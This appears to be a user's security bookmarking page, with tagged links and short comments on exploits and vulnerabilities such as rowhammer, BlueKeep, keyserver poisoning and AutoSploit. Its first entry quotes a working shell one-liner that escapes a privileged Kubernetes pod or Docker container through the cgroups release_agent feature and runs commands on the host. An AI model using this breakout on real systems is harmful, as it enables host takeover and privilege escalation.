Felix Wilhelm on Twitter: "Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature"
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
kubernetes  docker  container  breakout  exploit  security  hacking  pentesting 
12 weeks ago by asteroza
SKS Keyserver Network Under Attack
Uh, the GPG aspect means a risk of supply chain attack for all linux distros using GPG armoring on their package management/deployment architectures. Which is NOT GOOD. Also, Tor Browser Developer cert is now poisoned, so the supply chain attack has started...
PGP  OpenPGP  GnuPG  GPG  keyserver  network  spam  attack  poison  certificate  poisoning  DoS  security  exploit  hacking  pentesting 
july 2019 by asteroza
rowhammer is back with a vengence...
DRAM  RAM  ECC  memory  attack  exploit  rowhammer  security  hacking  pentesting 
june 2019 by asteroza
Prevent a worm by updating Remote Desktop Services (CVE-2019-0708) – MSRC
Probable wormable RDP exploit, preauth RCE. They are publishing XP patches, so this is pretty bad.
microsoft  windows  patch  XP  2003  RDP  exploit  sysadmin  tips  tricks 
may 2019 by asteroza
Faxsploit – Exploiting A Fax With A Picture | Hackaday
Sure this is about an all-in-one fax/printer rigs, but don't forget a lot of companies now also use fax to email gateways as well...
fax  exploit  OOB  attack  security  hacking  pentesting 
may 2019 by asteroza
649/Crashcast-Exploit: This tool allows you mass play any YouTube video with Chromecasts obtained from
Oh the unholy hell you could unleash with this. Naturally, there is a certain rickroll default if no particular video is selected...
chromecast  UPNP  exploit  rickroll  security  hacking  pentesting 
january 2019 by asteroza
[1901.01161] Page Cache Attacks
This is kinda bad, since it leverages software caches and can be hardware agnostic, allowing write once malware that works well all over (javascript?)
shadow  page  cache  side  channel  attack  exploit  security  hacking  pentesting 
january 2019 by asteroza
ECCploit: ECC Memory Vulnerable to Rowhammer Attacks After All - VUSec
DD3, but they think the same timing sidechannel is present in DDR4...
rowhammer  attack  exploit  timing  side  channel  DDR3  ECC 
november 2018 by asteroza
docker breakout
nice little container breakout with persistence implanting
docker  root  exploit  privilege  escalation  security  hacking  pentesting 
september 2018 by asteroza
Security | DMA | Hacking: Total Meltdown?
So we heard you've got meltdown, so we put meltdown in your meltdown...
PCILeech  DMA  windows  7  meltdown  exploit  privileged  memory  access  security  hacking  pentesting 
april 2018 by asteroza
ChipWhisperer® – NewAE Technology Inc.
Hardware hacking, using stuff now available on Mouser. Which means hardware attacks are now consumer grade, no nation state needed...
hacking  hardware  electronics  devices  chip  debug  reverse  engineering  security  pentesting  attack  exploit  firmware  analysis 
march 2018 by asteroza
NullArray/AutoSploit: Automated Mass Exploiter
Yanks target IP's from shodan then runs some metasploit packages. Like metasploit's old autopwn, but internet scale searching for low hanging fruit. Some skiddie is gonna get arrested for this...
automated  exploit  shodan  metasploit  security  hacking  pentesting  opensource  software  automation 
february 2018 by asteroza
Intel® Management Engine Critical Firmware Update (Intel SA-00086)
Security Advisory (Intel-SA-00086), a critical firmware vulnerability in systems. AKA the DOOM ME HOLE detection tool. Also , only detects, still need a separate ME firmware patch from your motherboard manufacturer...
linux  windows  intel  management  engine  ME  firmware  exploit  vulnerability  hole  detection  sysadmin  tools  utilities  software  security  version  check  test  checker  tester 
november 2017 by asteroza
